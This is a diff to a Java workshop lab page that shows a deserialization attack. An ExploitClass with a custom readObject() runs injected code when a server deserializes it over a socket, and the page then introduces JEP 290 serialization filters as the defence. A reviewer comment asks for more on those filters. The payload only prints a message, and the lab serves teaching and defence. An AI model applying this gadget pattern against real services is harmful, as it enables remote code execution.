step/serialization.md

```diff
@@ -1,109 +1,553 @@
+
+		@Override
+		public void run() {
+			System.out.println("Injected code executed, you have been hacked!");
+		}
+	};
+
+	@Override
+	public String toString() {
+		return "MessageClass [message=" + message + "]";
+	}
+
+	private final void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
+		in.defaultReadObject();
+		injectedCode.run();
+	}
+}
+```
+
+Compile `ExploitClass`:
+
+```
 <copy>
-conference-app/bin/start --help
+javac ExplotClass.java
 </copy>
 ```
 
-As you can see, using `jlink` with Helidon is simple and straight forward!
+`ExploitClass` defines and implements an instance of `CodeInjector` an interface that extends `Runnable` and `Serializable`. `ExploitClass` also defines its own `readObject()` method, which is one of the methods that controls serialization behavior. Most of the time developers just use the default one create by the java compiler. However a custom `readObject()` can also be used that will be called instead. In this example `readObject()` calls the runnable: `injectedCode.run();` in its body.
+
+Update `ClassSerializationClient` to send `ExploitClass` instead:
+
+```
+<copy>
+nano ClassSerializationClient.java
+</copy>
+```
+Copy/Paste the following:
+
+```
+<copy>
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.Serializable;
+import java.net.UnixDomainSocketAddress;
+import java.nio.ByteBuffer;
+import java.nio.channels.SocketChannel;
+
+public class ClassSerializationClient {
+
+	public static void main(String[] args) throws Exception {
+		var address = UnixDomainSocketAddress.of("mnt/server");
+		try (var clientChannel = SocketChannel.open(address)) {
+
+			ByteArrayOutputStream out = new ByteArrayOutputStream();
+			ExploitClass message = new ExploitClass("Hellow World!");
+			ObjectOutputStream objectStream = new ObjectOutputStream(out);
+			objectStream.writeObject(message);
+			ByteBuffer buf = ByteBuffer.wrap(out.toByteArray());
+
+			clientChannel.write(buf);
+		}
+	}
+}
+</copy>
+```
+
+Start the "Server":
+
+```
+<copy>
+java ClassSerializationServer.java
+</copy>
+```
+
+Run the "client":
+
+```
+<copy>
+java ClassSerializationClient.java
+</copy>
+```
+
+In the console the following should be printed:
+
+```
+Injected code executed, you have been hacked!
+Exception in thread "main" java.lang.ClassCastException: class ExploitClass cannot be cast to class MessageClass (ExploitClass and MessageClass are in unnamed module of loader 'app')
+	at ClassSerializationServer.main(ClassSerializationServer.java:27)
+```
+
+Even though `ClassSerializationServer` is expecting `MessageClass`, `ExploitClass.readObject()` is still executed and the "exploit" code is run. There is however a way to protect agains this expolit. 
+
+### JEP 290
+
+[JEP 290](https://openjdk.java.net/jeps/290) was added in JDK 9, and allows for options of definitions of filters on incoming serialization data to improve security and robustness. 
```

Comment:
Expand a bit on Serialisation Filters, add one or two paragraphs (not a full chapter) to explain 
- what they are
- what for
- how to use them (API or command-line)...